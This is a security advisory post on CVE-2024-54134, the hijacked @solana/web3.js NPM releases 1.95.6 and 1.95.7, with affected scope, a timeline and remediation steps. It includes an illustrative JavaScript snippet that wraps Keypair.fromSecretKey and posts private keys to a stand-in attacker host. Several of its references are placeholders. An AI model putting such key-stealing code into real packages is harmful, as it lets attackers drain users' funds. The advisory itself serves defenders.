CVE CyberSecurity Database News

CVE-2024-54134 - Solana’s @solana/web3.js NPM Package Compromise and What Developers Must Know

Poster -

In late 2024, the Solana developer community faced a serious supply-chain security threat: the JavaScript library @solana/web3.js, used by thousands of Solana-based decentralized apps (dapps), was compromised on NPM. This post explains what happened, how the exploit worked, who it affected, and the best steps to stay safe. If you’re working with Solana or use this library, this read is essential.

What is CVE-2024-54134?

CVE-2024-54134 identifies a security incident where the NPM account with publish access to @solana/web3.js library was compromised. The attacker uploaded unauthorized versions (1.95.6 and 1.95.7) with modified code intended to *steal private keys* and drain funds from vulnerable dapps.

Malicious versions removed: Shortly after discovery

- Patched version: 1.95.8

Affected:

- Dapps, scripts, bots, or backends using @solana/web3.js version 1.95.6 or 1.95.7 deployed or installed between 3:20pm and 8:25pm UTC on December 3, 2024
- Any Solana project that directly manages private keys with this library and updated during the above window

Not Affected:

- Non-custodial Solana wallets (e.g., Phantom, Solflare) — they *don’t* expose private keys to the library

Any project that didn’t update within the window or never used the malicious versions

It is important to remember: the Solana protocol itself was not breached. The threat came from the compromised *client library*.

How Was the Attack Executed?

The attacker, having gained control of the publish-access account, published seemingly legitimate versions. Inside the package was malicious code that harvested private key material and sent it to a remote server controlled by the attacker.

Here’s an illustrative (not actual) code snippet showing how the leak might work

// Example: Malicious behavior inside the compromised library
import { Keypair } from '@solana/web3.js';

const originalFromSecretKey = Keypair.fromSecretKey;

Keypair.fromSecretKey = function(secretKey, ...args) {
  // Exfiltrate the secretKey to attacker
  fetch("https://malicious-server.example/collect";, {
    method: "POST",
    body: JSON.stringify({ key: Array.from(secretKey) }),
    headers: { "Content-Type": "application/json" }
  }).catch(()=>{});

  // Proceed as normal
  return originalFromSecretKey.apply(this, [secretKey, ...args]);
}

*Actual code may be obfuscated or hidden deeper in the package sources.*

What Should You Do? (Immediate Steps)

1. Immediately Upgrade
Upgrade @solana/web3.js to 1.95.8 or above.

npm install @solana/web3.js@1.95.8

2. Rotate Keys
If your project ran the bad versions, even briefly, rotate all private keys used on any affected systems.
- This means: multisig authorities, mint authorities, program/admin keys, server wallets, deployment keypairs, etc.

3. Audit and Monitor

Look for outgoing requests to unknown hosts.

4. Note the Time Window

Supply Chain Attacks like this go after the libraries developers trust.

- Any script or bot that loaded a private key via the affected versions could unknowingly expose its secrets.
- Automated trading bots, NFT deployment scripts, on-chain game servers — all could lose funds or control.

> “If a server, script, or bot handled private keys with the compromised library, consider those keys lost. Funds could have been drained in an instant.” — Solana Status Announcement

Non-custodial wallet browser extensions are generally safe because the wallet manages the keys, not the library.

References and Official Sources

- Solana Status Update (incident ID pending)
- @solana/web3.js Release Notes
- CVE Record *(pending public release)*
- Malicious Package Report on GitHub *(example)*
- NPM Advisory *(search for solana/web3.js)*

Monitor official channels for package security updates, especially for blockchain projects.

Stay safe:
Upgrade, audit, and rotate. Solana itself remains secure, but this incident is a prime example that *supply chain attacks can happen to anyone, at any layer.*

For more details or advice:
Visit the Solana Discord, check status.solana.com, or review best practices in Solana’s developer documentation.


*If you think your system was affected, act quickly — and help spread the word to fellow developers in the Solana and web3 ecosystem.*

Timeline

Published on: 12/04/2024 16:15:26 UTC